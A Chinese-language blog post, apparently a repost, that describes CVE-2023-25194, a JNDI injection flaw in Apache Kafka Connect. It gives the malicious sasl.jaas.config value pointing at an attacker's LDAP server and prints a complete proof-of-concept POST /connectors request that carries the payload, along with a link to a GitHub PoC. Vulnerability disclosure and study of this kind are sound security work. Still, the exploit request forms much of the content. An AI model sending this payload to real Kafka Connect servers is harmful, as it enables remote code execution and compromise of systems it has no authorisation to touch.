devbox
不正经
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

CVE-2023-25194漏洞 Apache Kafka Connect JNDI注入漏洞

作者:不正经 | 2024-04-08 07:33:53

cve-2023-25194

Apache Kafka 的最新更新解决的一个漏洞是一个不安全的 Java 反序列化问题,可以利用该漏洞通过身份验证远程执行代码。

Apache Kafka 是一个开源分布式事件流平台,被数千家公司用于高性能数据管道、流分析、数据集成和任务关键型应用程序。超过 80% 的财富 100 强公司信任并使用 Kafka。

通过 Aiven API 或 Kafka Connect REST API 配置连接器时,攻击者可以为连接器设置database.history.producer.sasl.jaas.config连接器属性io.debezium.connector.mysql.MySqlConnector。其他 debezium 连接器也可能如此。通过将连接器值设置为"com.sun.security.auth.module.JndiLoginModule required user.provider.url="ldap://attacker_server" useFirstPass="true" serviceName="x" debug="true" group.provider.url="xxx";",服务器将连接到攻击者的 LDAP 服务器并反序列化 LDAP 响应,攻击者可以使用它在 kafka 连接服务器上执行 java 反序列化小工具链。

 链接HackerOne

 POCGitHub - ohnonoyesyes/CVE-2023-25194

  1. POST /connectors HTTP/1.1
  2. Host: xxxx:8083
  3. Cache-Control: max-age=0
  4. Upgrade-Insecure-Requests: 1
  5. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
  6. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  7. Accept-Encoding: gzip, deflate
  8. Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
  9. Content-Type: application/json
  10. Connection: close
  11. Content-Length: 1109
  12.  
  13. {"name": "test", 
  14.    "config":
  15.     {
  16.         "connector.class":"io.debezium.connector.mysql.MySqlConnector",
  17.     	"database.hostname": "xxxxx",
  18.     	"database.port": "3306",
  19.     	"database.user": "root",
  20.     	"database.password": "xxxxxx",
  21.     	"database.dbname": "xxxx",
  22.     	"database.sslmode": "SSL_MODE",
  23.         "database.server.id": "1234",
  24.     	"database.server.name": "localhost",
  25.         "table.include.list": "MYSQL_TABLES",
  26.     	"tasks.max":"1",
  27.         "topic.prefix": "aaa22",
  28.         "debezium.source.database.history": "io.debezium.relational.history.MemoryDatabaseHistory",
  29.         "schema.history.internal.kafka.topic": "aaa22",
  30.         "schema.history.internal.kafka.bootstrap.servers": "kafka:9202",
  31.     	"database.history.producer.security.protocol": "SASL_SSL",
  32.     	"database.history.producer.sasl.mechanism": "PLAIN",
  33.     	"database.history.producer.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://aaa\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
  34.     }
  35. }

 

 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/不正经/article/detail/383848
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号